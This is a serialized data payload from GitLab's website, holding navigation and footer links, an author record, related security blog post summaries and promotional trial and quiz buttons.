AWS",{"href":1196,"dataGaName":1194,"dataGaLocation":1181},"/partners/technology-partners/aws/",{"text":1198,"config":1199},"GitLab on Google Cloud",{"href":1200,"dataGaName":1198,"dataGaLocation":1181},"/partners/technology-partners/google-cloud-platform/",{"text":1202,"config":1203},"Why GitLab?",{"href":876,"dataGaName":1202,"dataGaLocation":1181},{"freeTrial":1205,"mobileIcon":1210,"desktopIcon":1215,"secondaryButton":1218},{"text":1206,"config":1207},"Start free trial",{"href":1208,"dataGaName":837,"dataGaLocation":1209},"https://gitlab.com/-/trials/new/","nav",{"altText":1211,"config":1212},"Gitlab Icon",{"src":1213,"dataGaName":1214,"dataGaLocation":1209},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203874/jypbw1jx72aexsoohd7x.svg","gitlab icon",{"altText":1211,"config":1216},{"src":1217,"dataGaName":1214,"dataGaLocation":1209},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203875/gs4c8p8opsgvflgkswz9.svg",{"text":1219,"config":1220},"Get Started",{"href":1221,"dataGaName":1222,"dataGaLocation":1209},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com/get-started/","get started",{"freeTrial":1224,"mobileIcon":1228,"desktopIcon":1230},{"text":1225,"config":1226},"Learn more about GitLab Duo",{"href":868,"dataGaName":1227,"dataGaLocation":1209},"gitlab duo",{"altText":1211,"config":1229},{"src":1213,"dataGaName":1214,"dataGaLocation":1209},{"altText":1211,"config":1231},{"src":1217,"dataGaName":1214,"dataGaLocation":1209},{"button":1233,"mobileIcon":1238,"desktopIcon":1240},{"text":1234,"config":1235},"/switch",{"href":1236,"dataGaName":1237,"dataGaLocation":1209},"#contact","switch",{"altText":1211,"config":1239},{"src":1213,"dataGaName":1214,"dataGaLocation":1209},{"altText":1211,"config":1241},{"src":1242,"dataGaName":1214,"dataGaLocation":1209},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1773335277/ohhpiuoxoldryzrnhfrh.png",{"freeTrial":1244,"mobileIcon":1249,"desktopIcon":1251},{"text":1245,"config":1246},"Back to pricing",{"href":981,"dataGaName":1247,"dataGaLocation":1209,"icon":1248},"back to pricing","GoBack",{"altText":1211,"config":1250},{"src":1213,"dataGaName":1214,"dataGaLocation":1209},{"altText":1211,"config":1252},{"src":1217,"dataGaName":1214,"dataGaLocation":1209},{"title":1254,"titleMobile":1255,"button":1256,"config":1261},"Duo Agent Platform delivers 400% ROI, per new Forrester Consulting study.","400% ROI: Forrester TEI for GitLab Duo",{"text":874,"config":1257},{"href":1258,"dataGaName":1259,"dataGaLocation":1260},"https://about.gitlab.com/blog/gitlab-duo-agent-platform-delivers-400-percent-roi/","forrester-tei-dap-banner","global-banner",{"layout":1262,"disabled":812},"release",{"data":1264},{"text":1265,"source":1266,"edit":1272,"contribute":1277,"config":1282,"items":1287,"minimal":1497},"Git is a trademark of Software Freedom Conservancy and our use of 'GitLab' is under license",{"text":1267,"config":1268},"View page source",{"href":1269,"dataGaName":1270,"dataGaLocation":1271},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/","page source","footer",{"text":1273,"config":1274},"Edit this page",{"href":1275,"dataGaName":1276,"dataGaLocation":1271},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/content/","web ide",{"text":1278,"config":1279},"Please contribute",{"href":1280,"dataGaName":1281,"dataGaLocation":1271},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/CONTRIBUTING.md/","please contribute",{"twitter":1283,"facebook":1284,"youtube":1285,"linkedin":1286},"https://twitter.com/gitlab","https://www.facebook.com/gitlab","https://www.youtube.com/channel/UCnMGQ8QHMAnVIsI3xJrihhg","https://www.linkedin.com/company/gitlab-com",[1288,1335,1389,1433,1465],{"title":979,"links":1289,"subMenu":1304},[1290,1294,1299],{"text":1291,"config":1292},"View plans",{"href":981,"dataGaName":1293,"dataGaLocation":1271},"view plans",{"text":1295,"config":1296},"Why Premium?",{"href":1297,"dataGaName":1298,"dataGaLocation":1271},"/pricing/premium/","why premium",{"text":1300,"config":1301},"Why Ultimate?",{"href":1302,"dataGaName":1303,"dataGaLocation":1271},"/pricing/ultimate/","why ultimate",[1305],{"title":1306,"links":1307},"Contact Us",[1308,1311,1313,1315,1320,1325,1330],{"text":1309,"config":1310},"Contact sales",{"href":1162,"dataGaName":842,"dataGaLocation":1271},{"text":1165,"config":1312},{"href":1167,"dataGaName":1168,"dataGaLocation":1271},{"text":1170,"config":1314},{"href":1172,"dataGaName":1173,"dataGaLocation":1271},{"text":1316,"config":1317},"Status",{"href":1318,"dataGaName":1319,"dataGaLocation":1271},"https://status.gitlab.com/","status",{"text":1321,"config":1322},"Terms of use",{"href":1323,"dataGaName":1324,"dataGaLocation":1271},"/terms/","terms of use",{"text":1326,"config":1327},"Privacy statement",{"href":1328,"dataGaName":1329,"dataGaLocation":1271},"/privacy/","privacy statement",{"text":1331,"config":1332},"Cookie preferences",{"dataGaName":1333,"dataGaLocation":1271,"id":1334,"isOneTrustButton":815},"cookie preferences","ot-sdk-btn",{"title":879,"links":1336,"subMenu":1345},[1337,1341],{"text":1338,"config":1339},"DevSecOps platform",{"href":861,"dataGaName":1340,"dataGaLocation":1271},"devsecops platform",{"text":1342,"config":1343},"AI-Assisted Development",{"href":868,"dataGaName":1344,"dataGaLocation":1271},"ai-assisted development",[1346],{"title":1347,"links":1348},"Topics",[1349,1354,1359,1364,1369,1374,1379,1384],{"text":1350,"config":1351},"CICD",{"href":1352,"dataGaName":1353,"dataGaLocation":1271},"/topics/ci-cd/","cicd",{"text":1355,"config":1356},"GitOps",{"href":1357,"dataGaName":1358,"dataGaLocation":1271},"/topics/gitops/","gitops",{"text":1360,"config":1361},"DevOps",{"href":1362,"dataGaName":1363,"dataGaLocation":1271},"/topics/devops/","devops",{"text":1365,"config":1366},"Version Control",{"href":1367,"dataGaName":1368,"dataGaLocation":1271},"/topics/version-control/","version control",{"text":1370,"config":1371},"DevSecOps",{"href":1372,"dataGaName":1373,"dataGaLocation":1271},"/topics/devsecops/","devsecops",{"text":1375,"config":1376},"Cloud Native",{"href":1377,"dataGaName":1378,"dataGaLocation":1271},"/topics/cloud-native/","cloud native",{"text":1380,"config":1381},"AI for Coding",{"href":1382,"dataGaName":1383,"dataGaLocation":1271},"/topics/devops/ai-for-coding/","ai for coding",{"text":1385,"config":1386},"Agentic AI",{"href":1387,"dataGaName":1388,"dataGaLocation":1271},"/topics/agentic-ai/","agentic ai",{"title":1390,"links":1391},"Solutions",[1392,1394,1396,1401,1405,1408,1412,1415,1417,1420,1423,1428],{"text":923,"config":1393},{"href":918,"dataGaName":923,"dataGaLocation":1271},{"text":912,"config":1395},{"href":895,"dataGaName":896,"dataGaLocation":1271},{"text":1397,"config":1398},"Agile development",{"href":1399,"dataGaName":1400,"dataGaLocation":1271},"/solutions/agile-delivery/","agile delivery",{"text":1402,"config":1403},"SCM",{"href":908,"dataGaName":1404,"dataGaLocation":1271},"source code management",{"text":1350,"config":1406},{"href":901,"dataGaName":1407,"dataGaLocation":1271},"continuous integration & delivery",{"text":1409,"config":1410},"Value stream management",{"href":951,"dataGaName":1411,"dataGaLocation":1271},"value stream management",{"text":1355,"config":1413},{"href":1414,"dataGaName":1358,"dataGaLocation":1271},"/solutions/gitops/",{"text":961,"config":1416},{"href":964,"dataGaName":965,"dataGaLocation":1271},{"text":1418,"config":1419},"Small business",{"href":970,"dataGaName":971,"dataGaLocation":1271},{"text":1421,"config":1422},"Public sector",{"href":976,"dataGaName":977,"dataGaLocation":1271},{"text":1424,"config":1425},"Education",{"href":1426,"dataGaName":1427,"dataGaLocation":1271},"/solutions/education/","education",{"text":1429,"config":1430},"Financial services",{"href":1431,"dataGaName":1432,"dataGaLocation":1271},"/solutions/finance/","financial services",{"title":984,"links":1434},[1435,1437,1439,1441,1444,1446,1449,1451,1453,1455,1457,1459,1461,1463],{"text":997,"config":1436},{"href":999,"dataGaName":1000,"dataGaLocation":1271},{"text":1002,"config":1438},{"href":1004,"dataGaName":1005,"dataGaLocation":1271},{"text":1007,"config":1440},{"href":1009,"dataGaName":1010,"dataGaLocation":1271},{"text":1012,"config":1442},{"href":1014,"dataGaName":1443,"dataGaLocation":1271},"docs",{"text":1034,"config":1445},{"href":1036,"dataGaName":1037,"dataGaLocation":1271},{"text":1447,"config":1448},"What's new",{"href":1094,"dataGaName":1095,"dataGaLocation":1271},{"text":1029,"config":1450},{"href":1031,"dataGaName":1032,"dataGaLocation":1271},{"text":1048,"config":1452},{"href":1050,"dataGaName":1051,"dataGaLocation":1271},{"text":1056,"config":1454},{"href":1058,"dataGaName":1059,"dataGaLocation":1271},{"text":1061,"config":1456},{"href":1063,"dataGaName":1064,"dataGaLocation":1271},{"text":1066,"config":1458},{"href":1068,"dataGaName":1069,"dataGaLocation":1271},{"text":1071,"config":1460},{"href":1073,"dataGaName":1074,"dataGaLocation":1271},{"text":1076,"config":1462},{"href":1078,"dataGaName":1079,"dataGaLocation":1271},{"text":1081,"config":1464},{"href":1083,"dataGaName":1084,"dataGaLocation":1271},{"title":1097,"links":1466},[1467,1469,1471,1473,1475,1477,1481,1486,1488,1490,1492],{"text":1105,"config":1468},{"href":1107,"dataGaName":1099,"dataGaLocation":1271},{"text":1110,"config":1470},{"href":1112,"dataGaName":1113,"dataGaLocation":1271},{"text":1118,"config":1472},{"href":1120,"dataGaName":1121,"dataGaLocation":1271},{"text":1123,"config":1474},{"href":1125,"dataGaName":1126,"dataGaLocation":1271},{"text":1128,"config":1476},{"href":1130,"dataGaName":1131,"dataGaLocation":1271},{"text":1478,"config":1479},"Sustainability",{"href":1480,"dataGaName":1478,"dataGaLocation":1271},"/sustainability/",{"text":1482,"config":1483},"Diversity, inclusion and belonging (DIB)",{"href":1484,"dataGaName":1485,"dataGaLocation":1271},"/diversity-inclusion-belonging/","Diversity, inclusion and belonging",{"text":1133,"config":1487},{"href":1135,"dataGaName":1136,"dataGaLocation":1271},{"text":1143,"config":1489},{"href":1145,"dataGaName":1146,"dataGaLocation":1271},{"text":1148,"config":1491},{"href":1150,"dataGaName":1151,"dataGaLocation":1271},{"text":1493,"config":1494},"Modern Slavery Transparency Statement",{"href":1495,"dataGaName":1496,"dataGaLocation":1271},"https://handbook.gitlab.com/handbook/legal/modern-slavery-act-transparency-statement/","modern slavery transparency statement",{"items":1498},[1499,1502,1505],{"text":1500,"config":1501},"Terms",{"href":1323,"dataGaName":1324,"dataGaLocation":1271},{"text":1503,"config":1504},"Cookies",{"dataGaName":1333,"dataGaLocation":1271,"id":1334,"isOneTrustButton":815},{"text":1506,"config":1507},"Privacy",{"href":1328,"dataGaName":1329,"dataGaLocation":1271},[1509],{"id":1510,"title":7,"body":811,"config":1511,"content":1513,"description":811,"extension":1517,"meta":1518,"navigation":815,"path":1519,"seo":1520,"stem":1521,"__hash__":1522},"blogAuthors/en-us/blog/authors/joern-schneeweisz.yml",{"template":1512},"BlogAuthor",{"name":7,"config":1514},{"headshot":1515,"ctfId":1516},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679144/Blog/Author%20Headshots/joernchen-headshot.png","joernchen","yml",{},"/en-us/blog/authors/joern-schneeweisz",{},"en-us/blog/authors/joern-schneeweisz","7lq_RPJjB0t-8_Ky8UIjryswPotuX6Aqerg4scz_2gI",[1524,1532,1540],{"title":1525,"description":1526,"heroImage":1527,"category":807,"date":1528,"authors":1529,"slug":1531,"externalUrl":811},"How GitLab tracks vulnerabilities through refactors and reformatting","Learn how GitLab's improved Scope+Offset fingerprinting keeps vulnerability tracking stable across comments, blank lines, and reformatting.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1759320418/xjmqcozxzt4frx0hori3.png","2026-08-12",[1530],"Julian Thome","improved-scope-offset-fingerprinting",{"title":1533,"description":1534,"heroImage":1527,"category":807,"date":1535,"authors":1536,"slug":1539,"externalUrl":811},"GitLab Secrets Manager adds ESO, Terraform, API support","Simplify credential management across your stack. GitLab Secrets Manager provides secure retrieval in Kubernetes, Terraform, and external workflows.","2026-08-06",[1537,1538],"Erick Bajao","Joe Randazzo","gitlab-secrets-manager-add-eso-terraform-api-support",{"title":1541,"description":1542,"heroImage":1543,"category":807,"date":1544,"authors":1545,"slug":1547,"externalUrl":811},"Secure every commit to production with Claude and GitLab","Claude Security catches vulnerabilities inside a coding session. GitLab picks up from there, scanning, enforcing policy, and producing audit evidence for the software lifecycle. ","https://res.cloudinary.com/about-gitlab-com/image/upload/v1756122536/akivvcnafog9c4dhhzkp.png","2026-08-03",[1546],"Alisa Ho","claude-security-and-gitlab",{"promotions":1549},[1550,1564,1576,1587],{"id":1551,"categories":1552,"header":1554,"text":1555,"button":1556,"image":1561},"ai-modernization",[1553],"ai","Is AI achieving its promise at scale?","Quiz will take 5 minutes or less",{"text":1557,"config":1558},"Get your AI maturity score",{"href":1559,"dataGaName":1560,"dataGaLocation":1037},"/assessments/ai-modernization-assessment/","modernization assessment",{"config":1562},{"src":1563},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138786/qix0m7kwnd8x2fh1zq49.png",{"id":1565,"categories":1566,"header":1568,"text":1555,"button":1569,"image":1573},"devops-modernization",[1567,1373],"product","Are you just managing tools or shipping innovation?",{"text":1570,"config":1571},"Get your DevOps maturity score",{"href":1572,"dataGaName":1560,"dataGaLocation":1037},"/assessments/devops-modernization-assessment/",{"config":1574},{"src":1575},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138785/eg818fmakweyuznttgid.png",{"id":1577,"categories":1578,"header":1579,"text":1555,"button":1580,"image":1584},"security-modernization",[807],"Are you trading speed for security?",{"text":1581,"config":1582},"Get your security maturity score",{"href":1583,"dataGaName":1560,"dataGaLocation":1037},"/assessments/security-modernization-assessment/",{"config":1585},{"src":1586},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138786/p4pbqd9nnjejg5ds6mdk.png",{"id":1588,"paths":1589,"header":1592,"text":1593,"button":1594,"image":1599},"github-azure-migration",[1590,1591],"migration-from-azure-devops-to-gitlab","integrating-azure-devops-scm-and-gitlab","Is your team ready for GitHub's Azure move?","GitHub is already rebuilding around Azure. Find out what it means for you.",{"text":1595,"config":1596},"See how GitLab compares to GitHub",{"href":1597,"dataGaName":1598,"dataGaLocation":1037},"/compare/gitlab-vs-github/github-azure-migration/","github azure migration",{"config":1600},{"src":1575},{"header":1602,"blurb":1603,"button":1604,"secondaryButton":1609},"Start building faster today","See what your team can do with the intelligent orchestration platform for DevSecOps.\n",{"text":1605,"config":1606},"Get your free trial",{"href":1607,"dataGaName":837,"dataGaLocation":1608},"https://gitlab.com/-/trial_registrations/new?glm_content=default-saas-trial&glm_source=about.gitlab.com/","feature",{"text":1309,"config":1610},{"href":1162,"dataGaName":842,"dataGaLocation":1608},1786803755949]